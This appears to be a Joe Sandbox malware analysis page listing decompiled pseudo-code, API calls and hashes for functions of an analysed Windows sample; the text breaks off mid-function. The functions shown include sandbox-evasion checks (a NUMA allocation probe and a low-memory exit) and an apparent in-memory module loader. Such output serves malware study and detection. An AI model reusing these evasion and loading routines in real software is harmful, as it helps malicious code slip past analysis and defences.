Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: _memset$AllocLocallstrlen
String ID: Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. $Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
API String ID: 1677474723-3961739458
Opcode ID: 0a2fc22235a3f2a2d291868e2ceb299ef04f07e31daa703d45cb5c75e0846094
Instruction ID: b7b77809502f16221a3d2e2de85bb383323a0c13118bcb0392eaa511c88ae931
Opcode Fuzzy Hash: 0a2fc22235a3f2a2d291868e2ceb299ef04f07e31daa703d45cb5c75e0846094
Instruction Fuzzy Hash: 1451D172D141586BCB12DAA5CD85BCEB3BCEF48304F4051F7A51DE3581DA38AB8A8F64

Uniqueness

Uniqueness Score: -1.00%

Function 0040B6E9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E0040B6E9(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t39;
				intOrPtr _t42;
				char* _t46;
				intOrPtr _t53;
				CHAR* _t56;
				void* _t77;
				void* _t78;
				intOrPtr _t79;

				_t74 = __esi;
				_t69 = __edi;
				_push(0x40);
				E00423679(E00433B95, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t77 - 4)) = 0;
				 *((intOrPtr*)(_t77 - 0x18)) = 0xf;
				 *((intOrPtr*)(_t77 - 0x1c)) = 0;
				 *((char*)(_t77 - 0x2c)) = 0;
				 *((char*)(_t77 - 4)) = 2;
				_t82 =  *((intOrPtr*)(_t77 + 0x1c)) - 0x10;
				_t56 =  *((intOrPtr*)(_t77 + 8));
				if( *((intOrPtr*)(_t77 + 0x1c)) < 0x10) {
					_t56 = _t77 + 8;
				}
				 *0x447510(E0040E6E2(_t56, _t69, _t74), "https");
				_push(0);
				_t79 = _t78 - 0x1c;
				 *((intOrPtr*)(_t77 - 0x4c)) = _t79;
				_push(_t77 + 8);
				_push(_t79);
				E0040CF4F(0, _t77 + 0x24, _t74, _t82);
				_push(_t77 - 0x48); // executed
				_t39 = E0040ABDE(0, _t77 + 0x24, _t74, _t82); // executed
				 *((char*)(_t77 - 4)) = 3;
				E00404A22(_t77 - 0x2c, _t39);
				 *((char*)(_t77 - 4)) = 2;
				E00404A66(_t77 - 0x48, 1, 0);
				_t42 =  *((intOrPtr*)(_t77 - 0x2c));
				if( *((intOrPtr*)(_t77 - 0x18)) < 0x10) {
					_t42 = _t77 - 0x2c;
				}
				_t76 = "ERROR";
				_push("ERROR");
				_push(_t42);
				if( *0x447510() == 0) {
					E00404AAA(0x4452cc, __eflags, _t76, E004201E0(_t76));
				} else {
					E00404B1F(0x4452cc, _t77 + 8, 0, 0xffffffff);
					_t85 =  *((intOrPtr*)(_t77 - 0x18)) - 0x10;
					_t53 =  *((intOrPtr*)(_t77 - 0x2c));
					if( *((intOrPtr*)(_t77 - 0x18)) < 0x10) {
						_t53 = _t77 - 0x2c;
					}
					E00408D57(0, _t85, _t53); // executed
				}
				_t46 =  *((intOrPtr*)(_t77 - 0x2c));
				 *((intOrPtr*)(_t77 - 0x1c)) = 0;
				if( *((intOrPtr*)(_t77 - 0x18)) < 0x10) {
					_t46 = _t77 - 0x2c;
				}
				 *_t46 = 0;
				E00404A66(_t77 - 0x2c, 1, 0);
				E00404A66(_t77 + 8, 1, 0);
				E00404A66(_t77 + 0x24, 1, 0);
				return E004236C3(0, 1, _t76);
			}

0x0040b6e9
0x0040b6e9
0x0040b6e9
0x0040b6f0
0x0040b6f7
0x0040b6fa
0x0040b701
0x0040b704
0x0040b707
0x0040b70b
0x0040b70f
0x0040b712
0x0040b714
0x0040b714
0x0040b722
0x0040b72a
0x0040b72b
0x0040b733
0x0040b736
0x0040b737
0x0040b73b
0x0040b745
0x0040b746
0x0040b753
0x0040b757
0x0040b764
0x0040b768
0x0040b771
0x0040b774
0x0040b776
0x0040b776
0x0040b779
0x0040b77e
0x0040b77f
0x0040b788
0x0040b7be
0x0040b78a
0x0040b796
0x0040b79b
0x0040b79f
0x0040b7a2
0x0040b7a4
0x0040b7a4
0x0040b7a8
0x0040b7ad
0x0040b7c7
0x0040b7ca
0x0040b7cd
0x0040b7cf
0x0040b7cf
0x0040b7d7
0x0040b7d9
0x0040b7e3
0x0040b7ed
0x0040b7f7

APIs

__EH_prolog3_GS.LIBCMT ref: 0040B6F0
StrCmpCA.SHLWAPI(00000000,https,00000040,0040CA01), ref: 0040B722
StrCmpCA.SHLWAPI(?,ERROR,00000001,00000000), ref: 0040B780
_strlen.LIBCMT ref: 0040B7B1

Strings

https, xrefs: 0040B717
ERROR, xrefs: 0040B779, 0040B77E, 0040B7B0, 0040B7B8

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: H_prolog3__strlen
String ID: ERROR$https
API String ID: 807648885-230934144
Opcode ID: dafe09528618fb5620f3c43d872316e264c76c773dc02c5132e2789b84176ed4
Instruction ID: dc8400c0ae0a28fd9a3fda5008c5b9184ea45a0ddffe5e7d38a7eaff0e89896a
Opcode Fuzzy Hash: dafe09528618fb5620f3c43d872316e264c76c773dc02c5132e2789b84176ed4
Instruction Fuzzy Hash: 703172B1D00108AADB00EFA9C8459DE7BB8EF55304F00842FF515B7182DB385B44CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040F703 Relevance: 9.1, APIs: 6, Instructions: 56
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E0040F703(void** __ebx, long* __esi, CHAR* _a4) {
				void* _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				void* _t12;
				long _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;

				_t26 = 0;
				_t12 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0); // executed
				_v8 = _t12;
				if(_t12 == 0 || _t12 == 0xffffffff) {
					L8:
					return _t26;
				} else {
					_push( &_v20);
					_push(_t12);
					if( *0x44732c() != 0 && _v16 == 0) {
						_t16 = _v20;
						 *__esi = _t16; // executed
						_t17 = LocalAlloc(0x40, _t16); // executed
						 *__ebx = _t17;
						if(_t17 != 0) {
							_t18 = ReadFile(_v8, _t17,  *__esi,  &_v12, 0); // executed
							_t26 = _t18 & (0 |  *__esi == _v12);
							if(_t26 == 0) {
								LocalFree( *__ebx);
							}
						}
					}
					CloseHandle(_v8);
					goto L8;
				}
			}

0x0040f70a
0x0040f71b
0x0040f721
0x0040f726
0x0040f787
0x0040f78b
0x0040f72d
0x0040f730
0x0040f731
0x0040f73a
0x0040f741
0x0040f747
0x0040f749
0x0040f74f
0x0040f753
0x0040f760
0x0040f772
0x0040f774
0x0040f778
0x0040f778
0x0040f774
0x0040f753
0x0040f781
0x00000000
0x0040f781

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00000001,00000000,00000001,?,?,?,0040939F), ref: 0040F71B
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0040939F,?,?), ref: 0040F732
LocalAlloc.KERNEL32(00000040,?,?,?,?,0040939F,?,?), ref: 0040F749
ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,0040939F,?,?), ref: 0040F760
LocalFree.KERNEL32(?,?,?,?,0040939F,?,?), ref: 0040F778
CloseHandle.KERNEL32(?,?,?,?,0040939F,?,?), ref: 0040F781

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: d87767b8c532ce54681db498de726c6dbe45bc1ab673d1fd4beee830f0b9398b
Instruction ID: a9687548deb023d62109a2ae9161339732213267e48bfdcff235a31502e4bf5f
Opcode Fuzzy Hash: d87767b8c532ce54681db498de726c6dbe45bc1ab673d1fd4beee830f0b9398b
Instruction Fuzzy Hash: 05117979610204ABDB209FB4CC48EAA7BB9EB89750F240579F902E32A0E7345946CA25

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 9.1, APIs: 6, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E00401000(void* __ecx) {
				void* _t2;
				void* _t3;
				void* _t5;
				void* _t11;

				_t2 =  *0x447514(GetCurrentProcess(), 0, 0x7d0, 0x3000, 0x40, 0); // executed
				if(_t2 == 0) {
					ExitProcess(0);
				}
				_t3 = VirtualAlloc(0, 0x17c841c0, 0x3000, 4); // executed
				_t11 = _t3;
				_push(_t3);
				if(_t3 != 0x11) {
					asm("cld");
				}
				asm("clc");
				_pop(_t5);
				if(_t11 != 0) {
					E0041F6B0(_t11, 0, 0x5e69ec0);
					_push(0);
					asm("cld");
					return VirtualFree(_t11, 0x17c841c0, 0x8000);
				}
				return _t5;
			}

0x0040101b
0x00401023
0x00401026
0x00401026
0x00401036
0x0040103c
0x0040103e
0x00401042
0x00401046
0x00401047
0x0040104b
0x0040104c
0x0040104f
0x0040105b
0x00401063
0x00401068
0x00000000
0x00401071
0x0040107a

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00401014
VirtualAllocExNuma.KERNEL32(00000000), ref: 0040101B
ExitProcess.KERNEL32 ref: 00401026
VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00401036
_memset.LIBCMT ref: 0040105B
VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00401071

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
String ID:
API String ID: 1859398019-0
Opcode ID: b84924592270517cae30ad023048be7ebd060aaa961d450367542efb76564c21
Instruction ID: fe2bb41173431de17ddc3c60750d0703fdc1a184f20c293e36edd43865b8609b
Opcode Fuzzy Hash: b84924592270517cae30ad023048be7ebd060aaa961d450367542efb76564c21
Instruction Fuzzy Hash: 47F0C8B66412207BE2102B752CCCF7B1E9CDB477A9F101475F645E3251D6384C0995BC

Uniqueness

Uniqueness Score: -1.00%

Function 00420467 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 93%

			E00420467(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char* _v8;
				signed int _v16;
				char _v20;
				void* __ebp;
				void* _t34;
				signed int _t35;
				signed int _t39;
				intOrPtr _t42;
				intOrPtr _t44;
				void* _t51;
				intOrPtr* _t54;
				signed int _t59;
				signed int _t60;
				void* _t63;
				void* _t64;
				void* _t66;
				intOrPtr* _t68;

				_t66 = __esi;
				_t64 = __edi;
				_t63 = __edx;
				_t51 = __ebx;
				while(1) {
					_t34 = E0041FC5B(_t63, _t64, _t66, _a4); // executed
					if(_t34 != 0) {
						return _t34;
					}
					_t35 = E00426598(_t34, _a4);
					__eflags = _t35;
					if(_t35 == 0) {
						__eflags =  *0x445c9c & 0x00000001;
						if(( *0x445c9c & 0x00000001) == 0) {
							 *0x445c9c =  *0x445c9c | 0x00000001;
							__eflags =  *0x445c9c;
							_push(1);
							_v8 = "bad allocation";
							E0041FCEF(0x445c90,  &_v8);
							 *0x445c90 = 0x43525c;
							E00422011( *0x445c9c, E004347EF);
						}
						_t54 =  &_v20;
						E0041FDFC(_t54, 0x445c90);
						_v20 = 0x43525c;
						E004231B6( &_v20, 0x441640);
						asm("int3");
						_t39 = _v16;
						_push(0x43525c);
						_t68 = _t54;
						 *((char*)(_t68 + 0xc)) = 0;
						__eflags = _t39;
						if(__eflags != 0) {
							 *_t68 =  *_t39;
							_t32 = _t39 + 4; // 0x40499e
							 *((intOrPtr*)(_t68 + 4)) =  *_t32;
						} else {
							_t42 = E00428172(_t51, _t63, __eflags);
							 *((intOrPtr*)(_t68 + 8)) = _t42;
							 *_t68 =  *((intOrPtr*)(_t42 + 0x6c));
							 *((intOrPtr*)(_t68 + 4)) =  *((intOrPtr*)(_t42 + 0x68));
							__eflags =  *_t68 -  *0x444de0; // 0x5b11a0
							if(__eflags != 0) {
								_t60 =  *0x444b98; // 0xfffffffe
								__eflags =  *(_t42 + 0x70) & _t60;
								if(__eflags == 0) {
									 *_t68 = E00427F49(_t51, _t63, 0x445c90, _t68, __eflags);
								}
							}
							__eflags =  *((intOrPtr*)(_t68 + 4)) -  *0x444aa0; // 0x5b1628
							if(__eflags != 0) {
								_t59 =  *0x444b98; // 0xfffffffe
								__eflags =  *( *((intOrPtr*)(_t68 + 8)) + 0x70) & _t59;
								if(__eflags == 0) {
									 *((intOrPtr*)(_t68 + 4)) = E004277C8(_t51, _t63, 0x445c90, _t68, __eflags);
								}
							}
							_t44 =  *((intOrPtr*)(_t68 + 8));
							__eflags =  *(_t44 + 0x70) & 0x00000002;
							if(( *(_t44 + 0x70) & 0x00000002) == 0) {
								 *(_t44 + 0x70) =  *(_t44 + 0x70) | 0x00000002;
								 *((char*)(_t68 + 0xc)) = 1;
							}
						}
						return _t68;
					} else {
						continue;
					}
					break;
				}
			}

0x00420467
0x00420467
0x00420467
0x00420467
0x0042047e
0x00420481
0x00420489
0x0042048c
0x0042048c
0x00420474
0x0042047a
0x0042047c
0x0042048d
0x0042049e
0x004204a0
0x004204a0
0x004204a7
0x004204af
0x004204b6
0x004204c0
0x004204c6
0x004204cb
0x004204cd
0x004204d0
0x004204de
0x004204e1
0x004204e6
0x004204ec
0x004204ef
0x004204f0
0x004204f2
0x004204f6
0x004204f8
0x0042055f
0x00420561
0x00420564
0x004204fa
0x004204fa
0x004204ff
0x00420505
0x0042050a
0x0042050f
0x00420515
0x00420517
0x0042051d
0x00420520
0x00420527
0x00420527
0x00420520
0x0042052c
0x00420532
0x00420537
0x0042053d
0x00420540
0x00420547
0x00420547
0x00420540
0x0042054a
0x0042054d
0x00420551
0x00420553
0x00420557
0x00420557
0x00420551
0x0042056b
0x00000000
0x00000000
0x00000000
0x00000000
0x0042047c

APIs

_malloc.LIBCMT ref: 00420481

Part of subcall function 0041FC5B: __FF_MSGBANNER.LIBCMT ref: 0041FC74
Part of subcall function 0041FC5B: __NMSG_WRITE.LIBCMT ref: 0041FC7B
Part of subcall function 0041FC5B: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,000003E8,00000400,?,00420486,0040B965,?,?,0040B965,00000400,?,00000000,000003E8), ref: 0041FCA0

std::exception::exception.LIBCMT ref: 004204B6
std::exception::exception.LIBCMT ref: 004204D0
__CxxThrowException@8.LIBCMT ref: 004204E1

Strings

bad allocation, xrefs: 004204AF

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID: bad allocation
API String ID: 615853336-2104205924
Opcode ID: b8b5342d5123f70ff87a4dfbdfa3d742a36d0589677a1180cf0927a44bb0c726
Instruction ID: d50cedf652343434c77469705692eee090251160c00adebbb00f702ba3980d13
Opcode Fuzzy Hash: b8b5342d5123f70ff87a4dfbdfa3d742a36d0589677a1180cf0927a44bb0c726
Instruction Fuzzy Hash: 4FF0FE346006296BCF00FF55EC43A9E7BA96B44314F54406FF904A61A3DB7C9A46CB4C

Uniqueness

Uniqueness Score: -1.00%

Function 00417BB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00417BB8(void* __eax, void* __eflags) {
				void* __edi;
				void* __esi;
				CHAR* _t7;
				signed int _t11;
				void* _t14;
				signed int _t17;
				void* _t18;
				void* _t20;
				void* _t21;
				void* _t22;
				CHAR* _t23;
				void* _t24;

				_t14 = __eax;
				_t7 = E0041FC5B(_t18, _t20, _t22, __eax); // executed
				_t23 = _t7;
				 *_t23 = 0;
				E00422F99(GetTickCount()); // executed
				_t21 = 0;
				_t26 = _t14;
				if(_t14 > 0) {
					_t21 = _t14;
					do {
						_t11 = E00422FAB(_t26);
						_t17 = 0xa;
						asm("cdq");
						wsprintfA(_t23, "%s%d", _t23, _t11 % _t17);
						_t24 = _t24 + 0x10;
						_t14 = _t14 - 1;
					} while (_t14 != 0);
				}
				 *((char*)(_t21 + _t23)) = 0;
				return _t23;
			}

0x00417bba
0x00417bbe
0x00417bc3
0x00417bc6
0x00417bd0
0x00417bd5
0x00417bd8
0x00417bda
0x00417bdc
0x00417bde
0x00417bde
0x00417be5
0x00417be6
0x00417bf1
0x00417bf7
0x00417bfa
0x00417bfa
0x00417bde
0x00417bfd
0x00417c06

APIs

_malloc.LIBCMT ref: 00417BBE

Part of subcall function 0041FC5B: __FF_MSGBANNER.LIBCMT ref: 0041FC74
Part of subcall function 0041FC5B: __NMSG_WRITE.LIBCMT ref: 0041FC7B
Part of subcall function 0041FC5B: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,000003E8,00000400,?,00420486,0040B965,?,?,0040B965,00000400,?,00000000,000003E8), ref: 0041FCA0

GetTickCount.KERNEL32 ref: 00417BC9

Part of subcall function 00422F99: __getptd.LIBCMT ref: 00422F9E

_rand.LIBCMT ref: 00417BDE

Part of subcall function 00422FAB: __getptd.LIBCMT ref: 00422FAB

wsprintfA.USER32 ref: 00417BF1

Strings

%s%d, xrefs: 00417BEB

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: __getptd$AllocateCountHeapTick_malloc_randwsprintf
String ID: %s%d
API String ID: 2840978672-1110647743
Opcode ID: 988b28b55b838720c900d1ac0cd85023064ce565791ffbe37e8059da67d9494d
Instruction ID: b101ba395074b4683c50dad48d0e6941be842e6b79d36d8a2d4493eb56cfe9e2
Opcode Fuzzy Hash: 988b28b55b838720c900d1ac0cd85023064ce565791ffbe37e8059da67d9494d
Instruction Fuzzy Hash: 2AE02B7230D3617AE2202BBEAC85B675A5CCFC6329F24007FF504C6142DEAC9C5142BD

Uniqueness

Uniqueness Score: -1.00%

Function 0040107B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040107B(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi) {
				signed int _v8;
				unsigned int _v64;
				signed int _v68;
				char _v76;
				signed int _t12;
				struct _MEMORYSTATUSEX* _t16;
				unsigned int _t17;
				unsigned int _t19;
				intOrPtr _t20;
				signed int _t21;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				signed int _t28;
				unsigned int _t32;

				_t27 = __esi;
				_t26 = __edi;
				_t20 = __ebx;
				_t12 =  *0x444664; // 0xfa3a0753
				_v8 = _t12 ^ _t28;
				E0041F6B0( &_v76, 0, 0x40);
				_t16 =  &_v76;
				_v76 = 0x40;
				GlobalMemoryStatusEx(_t16); // executed
				if(_t16 != 1) {
					_t21 = 0;
					_t17 = 0;
				} else {
					_t19 = _v64;
					_t21 = (_t19 << 0x00000020 | _v68) >> 0x14;
					_t17 = _t19 >> 0x14;
				}
				_t32 = _t17;
				if(_t32 <= 0 && (_t32 < 0 || _t21 < 0x3d4)) {
					ExitProcess(0);
				}
				return E0041F69E(_t17, _t20, _v8 ^ _t28, _t25, _t26, _t27);
			}

0x0040107b
0x0040107b
0x0040107b
0x00401081
0x00401088
0x00401093
0x0040109b
0x0040109f
0x004010a6
0x004010af
0x004010c0
0x004010c2
0x004010b1
0x004010b1
0x004010b7
0x004010bb
0x004010bb
0x004010c4
0x004010c6
0x004010d4
0x004010d4
0x004010e5

APIs

_memset.LIBCMT ref: 00401093
GlobalMemoryStatusEx.KERNEL32(?), ref: 004010A6
ExitProcess.KERNEL32 ref: 004010D4

Strings

@, xrefs: 0040109F

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: ExitGlobalMemoryProcessStatus_memset
String ID: @
API String ID: 2847449748-2766056989
Opcode ID: 1ed30f666507ad3a46ab658adbf376e77026147c9e0ca13060da7d114250f497
Instruction ID: 506622faed00c5439fb7e56c091b8b115b45fafbbf1b89b2b5d280f5c0f459e3
Opcode Fuzzy Hash: 1ed30f666507ad3a46ab658adbf376e77026147c9e0ca13060da7d114250f497
Instruction Fuzzy Hash: 6FF0C270A102489BDB04DFA4D956B9D77F8EF04300F40003AEA02F72E0EA78D5858B5D

Uniqueness

Uniqueness Score: -1.00%

Function 0041803D Relevance: 6.0, APIs: 4, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0041803D(void* __ecx, CHAR* _a4) {
				void* _v8;
				char _v12;
				void* _t5;
				void* _t7;
				intOrPtr _t9;
				void* _t15;

				_t5 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x80, 0); // executed
				_t15 = _t5;
				if(_t15 != 0xffffffff) {
					_t7 =  *0x44732c(_t15,  &_v12);
					_push(_t15);
					if(_t7 != 0) {
						CloseHandle();
						_t9 = _v12;
					} else {
						CloseHandle();
						goto L1;
					}
				} else {
					L1:
					_t9 = 0;
				}
				return _t9;
			}

0x00418058
0x0041805e
0x00418063
0x00418070
0x00418076
0x00418079
0x00418083
0x00418089
0x0041807b
0x0041807b
0x00000000
0x0041807b
0x00418065
0x00418065
0x00418065
0x00418067
0x00418091

APIs

CreateFileA.KERNEL32(0040A258,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,?,0040A258,?), ref: 00418058
GetFileSizeEx.KERNEL32(00000000,0040A258,?,?,?,0040A258,?), ref: 00418070
CloseHandle.KERNEL32(00000000,?,?,?,0040A258,?), ref: 0041807B
CloseHandle.KERNEL32(00000000,?,?,?,0040A258,?), ref: 00418083

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateSize
String ID:
API String ID: 4148174661-0
Opcode ID: 6e2ed5d710e1eaac125af0a18ab868d5bf1498c97e5264006990ab1f94554383
Instruction ID: e8591c9e1be8a463c68c149e3ee7219caf1f812b275ecb75d7b4d323e17ff77a
Opcode Fuzzy Hash: 6e2ed5d710e1eaac125af0a18ab868d5bf1498c97e5264006990ab1f94554383
Instruction Fuzzy Hash: CFF08935544218FFE7109B70DC09FDB7E6CDB0A760F214225FE01A21D0DB706A86D559

Uniqueness

Uniqueness Score: -1.00%

Function 0040479E Relevance: 4.6, APIs: 3, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0040479E(intOrPtr* __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v44;
				intOrPtr _v172;
				intOrPtr* _v252;
				char _v356;
				intOrPtr _v360;
				signed int _t37;
				intOrPtr* _t40;
				intOrPtr _t52;
				intOrPtr* _t53;
				intOrPtr* _t54;
				void* _t56;
				void* _t59;
				intOrPtr* _t60;
				intOrPtr* _t63;
				intOrPtr _t64;
				signed int _t71;
				signed int _t72;

				_t69 = __esi;
				_t65 = __edi;
				_t64 = __edx;
				_t54 = __ebx;
				_t37 =  *0x444664; // 0xfa3a0753
				_v8 = _t37 ^ _t72;
				_t39 = _a4;
				_v360 = _a4;
				if(E004048DB != 0) {
					_push(__esi);
					_push(__edi);
					_t70 =  &_v356;
					_v44 = 0;
					_v24 = 0;
					_v16 = 0;
					_v20 = 0;
					_v12 = 0;
					_t40 = E00404345( &_v356, __eflags, _t39);
					_pop(_t56);
					__eflags = _t40;
					if(_t40 == 0) {
						_t40 = E004043FB(_t56,  &_v356); // executed
						__eflags = _t40;
						if(__eflags == 0) {
							_t40 = E004044A0(_t70, __eflags, _v360);
							_pop(_t59);
							__eflags = _t40;
							if(_t40 == 0) {
								_t40 = E00404521(_t70);
								__eflags = _t40;
								if(_t40 == 0) {
									_t40 = E004045C5(_t70);
									__eflags = _t40;
									if(_t40 == 0) {
										_t40 = E004046FE(_t59, _t70); // executed
										__eflags = _t40;
										if(_t40 == 0) {
											_t60 = _v252;
											__eflags = _t60;
											if(_t60 == 0) {
												L11:
												__eflags = _t54;
												if(_t54 == 0) {
													__eflags = _v24;
													if(_v24 != 0) {
														_t71 = 0;
														__eflags = _v20;
														if(_v20 > 0) {
															do {
																FreeLibrary( *(_v24 + _t71 * 4));
																_t71 = _t71 + 1;
																__eflags = _t71 - _v20;
															} while (_t71 < _v20);
														}
														E0041FC21(_v24);
													}
												} else {
													 *((intOrPtr*)(_t54 + 8)) = _v32;
													 *((intOrPtr*)(_t54 + 0xc)) = _v28;
													 *((intOrPtr*)(_t54 + 0x10)) = _v12;
													 *((intOrPtr*)(_t54 + 0x14)) = _v172;
													 *((intOrPtr*)(_t54 + 0x18)) = _v24;
													 *_t54 = 0x20;
													 *((intOrPtr*)(_t54 + 4)) = 0;
													 *((intOrPtr*)(_t54 + 0x1c)) = _v20;
												}
												__eflags = _v44;
												if(_v44 != 0) {
													E0041FC21(_v44);
												}
												_t40 = 0;
												__eflags = 0;
											} else {
												_t52 = _v32;
												_t63 = _t60 + _t52;
												_v12 = _t63;
												_t53 =  *_t63(_t52, 1, 0);
												__eflags = _t53;
												if(_t53 != 0) {
													goto L11;
												} else {
													_t40 = 0xa;
												}
											}
										}
									}
								}
							}
						}
					}
					_pop(_t65);
					_pop(_t69);
				} else {
					_t40 = 0xfffffffe;
				}
				return E0041F69E(_t40, _t54, _v8 ^ _t72, _t64, _t65, _t69);
			}

0x0040479e
0x0040479e
0x0040479e
0x0040479e
0x004047a7
0x004047ae
0x004047b1
0x004047b9
0x004047c1
0x004047cb
0x004047cc
0x004047d0
0x004047d6
0x004047d9
0x004047dc
0x004047df
0x004047e2
0x004047e5
0x004047ea
0x004047eb
0x004047ed
0x004047f3
0x004047f8
0x004047fa
0x00404806
0x0040480b
0x0040480c
0x0040480e
0x00404814
0x00404819
0x0040481b
0x00404821
0x00404826
0x00404828
0x00404830
0x00404837
0x00404839
0x0040483f
0x00404845
0x00404847
0x00404860
0x00404860
0x00404862
0x00404896
0x00404899
0x0040489b
0x0040489d
0x004048a0
0x004048a2
0x004048a8
0x004048ae
0x004048af
0x004048af
0x004048a2
0x004048b7
0x004048bc
0x00404864
0x00404867
0x0040486d
0x00404873
0x0040487c
0x00404882
0x00404888
0x0040488e
0x00404891
0x00404891
0x004048bd
0x004048c0
0x004048c5
0x004048ca
0x004048cb
0x004048cb
0x00404849
0x00404849
0x0040484f
0x00404852
0x00404855
0x00404857
0x00404859
0x00000000
0x0040485b
0x0040485d
0x0040485d
0x00404859
0x00404847
0x00404839
0x00404828
0x0040481b
0x0040480e
0x004047fa
0x004048cd
0x004048ce
0x004047c3
0x004047c5
0x004047c5
0x004048da

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6eddb9e780497238068c7ab927ef5e4e8607131f071d323df009ee956f251ae
Instruction ID: d6c25b04de78d53f328c388d28f1479716f601e5cc207f47843d2504d674a93d
Opcode Fuzzy Hash: e6eddb9e780497238068c7ab927ef5e4e8607131f071d323df009ee956f251ae
Instruction Fuzzy Hash: B23150B5D006159FCF11EF95C8815AEBBF1EFC4314F20897BD604F7281E63899858B59

Uniqueness

Uniqueness Score: -1.00%

Function 0041DBC1 Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041DBC1(long __edi, void* __esi) {
				void* _t15;
				void* _t16;

